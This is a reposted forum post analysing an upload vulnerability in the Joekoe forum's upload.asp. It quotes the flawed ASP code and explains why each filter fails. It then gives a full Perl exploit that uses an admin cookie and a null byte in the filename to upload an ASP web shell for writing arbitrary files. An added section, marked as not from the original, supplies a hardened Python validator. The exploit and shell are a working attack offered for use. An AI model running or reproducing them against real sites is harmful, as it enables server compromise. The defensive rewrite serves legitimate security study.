[Repost] A simple analysis of the Joekoe forum upload.asp file


Author: xiaolu

Preface: Yesterday on the Hacker Defense (黑防) website I saw that issue 8 of the magazine has an article titled 《乔客论坛惊爆UPfile严重漏洞》 ("Serious UPfile vulnerability revealed in the Joekoe forum"). Unfortunately I cannot buy Hacker Defense where I am, so I had to analyze it myself. The following is based on the free 6.6 version of the Joekoe full-site package.
First, the upload.asp code:
<%
dim formname,upload_path,upload_type,upload_size,uup
uup="|article|down|forum|gallery|news|other|product|video|website|"

up_name=trim(upload.form("up_name"))
up_text=trim(upload.form("up_text"))
up_path=trim(upload.form("up_path"))
if session("joekoe_online_admin")<>"joekoe_admin" and len(up_name)>2 then up_name=""
if len(up_name)<3 then up_name=up_name&upload_time(now_time)
if int(instr(uup,"|"&up_path&"|"))=0 then up_path="other"
if len(up_path)<3 then up_path="other"
uppath=up_path
if right(upload_path,1)<>"/" then upload_path=upload_path&"/"
up_path=server.mappath(upload_path&up_path)

upfile_name=Right(upfilename,(len(upfilename)-Instr(upfilename,".")))
upfile_name=lcase(upfile_name)
if instr(","&upload_type&",",","&upfile_name&",")>0 then
upfile_name2=upfile_name
upfile_name=up_name&"."&upfile_name
upfile.SaveAs up_path&upfile_name

else
uptemp="<font class=red_2>上传失败</font>:文件类型只能为:"&replace(upload_type,"|","、")&"等格式) "&go_back
end if

Look at the submitted variables: up_name, up_path, up_text and upfile_name. First the up_path part, i.e. this line:
if int(instr(uup,"|"&up_path&"|"))=0 then up_path="other"
As long as the value of up_path is not one of the entries in uup, namely:
article, down, forum, gallery, news, other, product, video, website
up_path becomes the other directory, so there is nothing for us to work with here. Next look at upfile_name, that is, the file extension:
upfile_name=Right(upfilename,(len(upfilename)-Instr(upfilename,".")))
This filter is fairly strict: the filename can effectively contain only one "." character. A filename such as asp.asp.gif is also treated as invalid, because the code takes everything from the first "." to the end of the name (giving "asp.gif", which is not in the allowed type list). So forget this one. It is obvious from the code that up_text is of no use to us. That leaves only up_name:
if session("joekoe_online_admin")<>"joekoe_admin" and len(up_name)>2 then up_name=""
if len(up_name)<3 then up_name=up_name&upload_time(now_time)
If we have not logged into the back end as an administrator, i.e. session("joekoe_online_admin")<>"joekoe_admin", then as soon as up_name is longer than 2 characters it is reset to an empty string. Annoying. But when session("joekoe_online_admin")="joekoe_admin" this can be exploited; the exploit program is below (an admin cookie is required):
#!/usr/bin/perl
$| = 1;
use Socket;
$host = "10.0.0.1";
$port = "80";
$str =
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"up_path\"\r\n".
"\r\n".
"gallery\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"up_name\"\r\n".
"\r\n".
"p.asp\0\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"up_text\"\r\n".
"\r\n".
"spic\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"file_name1\"; filename=\"F:\\tools\\sql\\getwebs\\p.gif\"\r\n".
"Content-Type: text/plain\r\n".
"\r\n".
"<%dim objFSO%>\r\n".
"<%dim fdata%>\r\n".
"<%dim objCountFile%>\r\n".
"<%on error resume next%>\r\n".
"<%Set objFSO = Server.CreateObject(\"Scripting.FileSystemObject\")%>\r\n".
"<%if Trim(request(\"syfdpath\"))<>\"\" then%>\r\n".
"<%fdata = request(\"cyfddata\")%>\r\n".
"<%Set objCountFile=objFSO.CreateTextFile(request(\"syfdpath\"),True)%>\r\n".
"<%objCountFile.Write fdata%>\r\n".
"<%if err =0 then%>\r\n".
"<%response.write \"<font color=red>save Success!</font>\"%>\r\n".
"<%else%>\r\n".
"<%response.write \"<font color=red>Save UnSuccess!</font>\"%>\r\n".
"<%end if%>\r\n".
"<%err.clear%>\r\n".
"<%end if%>\r\n".
"<%objCountFile.Close%>\r\n".
"<%Set objCountFile=Nothing%>\r\n".
"<%Set objFSO = Nothing%>\r\n".
"<%=server.mappath(Request.ServerVariables(\"SCRIPT_NAME\"))%>\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"submit\"\r\n".
"\r\n".
"点击上传\r\n".
"-----------------------------7d41869a401aa\r\n".
"\r\n";
print $str;
$len=length($str);

$req ="POST /jj/upload.asp?action=upfile HTTP/1.0\r\n".
#"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n".
"Referer: http://10.0.0.1/jj/upload.asp?uppath=gallery&upname=gs200483164242&uptext=spic\r\n".
#"Accept-Language: zh-cn\r\n".
"Content-Type: multipart/form-data; boundary=---------------------------7d41869a401aa\r\n".
#"Accept-Encoding: gzip, deflate\r\n".
#"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; (R1 1.5); .NET CLR 1.1.4322)\r\n".
"Host: 10.0.0.1\r\n".
"Content-Length: $len\r\n".
#"Connection: Keep-Alive\r\n".
#"Cache-Control: no-cache\r\n".
"Cookie: ASPSESSIONIDQAQQRCTQ=DOKDHBIALDIDGJFJMCMMIBFJ; joekoe%5Fonline=login%5Fpassword=dd15f89d35c36afb&guest%5Fname=&login%5Fusername=joekoe&counters=yes\r\n".
"\r\n".
"$str";
print $req;
@res = sendraw($req);
print @res;


#Hmm...Maybe you can send it by other way


sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems\n");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $req;
my @res = <S>;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect...\n");
}
}
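Added example (not from the original post and not Joekoe's code): a Python rewrite of the upload checks discussed above, in hardened form. It assumes an upload root of /var/www/upload and an allowed-extension set of gif/jpg/jpeg/png, since the original reads upload_path and upload_type from configuration, and the SAFE_NAME character allowlist for the admin-supplied up_name is this example's own. The original takes the extension from the first dot and performs no character check on up_name (the request above sends "p.asp\0" in that field); here the extension comes from the last dot, up_name must be plain alphanumeric, and the final path is checked to stay inside the target folder.

```python
import posixpath
import re
import time

# Target folders are the uup list from upload.asp. The extension list is read
# from configuration (upload_type) in the original and UPLOAD_ROOT stands in
# for upload_path; both values here are assumed for the example.
ALLOWED_PATHS = {"article", "down", "forum", "gallery", "news", "other",
                 "product", "video", "website"}
ALLOWED_EXTS = {"gif", "jpg", "jpeg", "png"}
UPLOAD_ROOT = "/var/www/upload"
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,40}")  # no dots, NULs, slashes

def validate_upload(up_path, up_name, upfilename, is_admin, stamp):
    """Return the path the file may be stored at, or raise ValueError.

    Unlike upload.asp: the extension is taken after the LAST dot, so
    'asp.asp.gif' is a gif and 'x.gif.asp' is rejected; an admin-chosen
    up_name must fully match SAFE_NAME, so a NUL byte, a second extension
    or a path separator never reaches SaveAs; non-admins never pick the name.
    """
    if up_path not in ALLOWED_PATHS:
        up_path = "other"
    # Browsers may send a full client path (the request above sends F:\...).
    base = posixpath.basename(upfilename.replace("\\", "/"))
    _, dot, ext = base.rpartition(".")
    ext = ext.lower()
    if not dot or ext not in ALLOWED_EXTS:
        raise ValueError("extension %r not allowed" % ext)
    if is_admin and up_name:
        if not SAFE_NAME.fullmatch(up_name):
            raise ValueError("up_name contains disallowed characters")
        name = up_name
    else:
        # Server-generated name, like upload_time(now_time) in the original.
        name = time.strftime("%Y%m%d%H%M%S", time.gmtime(stamp))
    folder = posixpath.join(UPLOAD_ROOT, up_path)
    target = posixpath.normpath(posixpath.join(folder, name + "." + ext))
    if posixpath.dirname(target) != folder:
        raise ValueError("target escapes the upload folder")
    return target

def accepted(up_path, up_name, upfilename, is_admin, stamp=0):
    # True if validate_upload would store the file.
    try:
        validate_upload(up_path, up_name, upfilename, is_admin, stamp)
        return True
    except ValueError:
        return False
```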
Afterword: Extremely frustrated... Can anyone show me the Hacker Defense article?
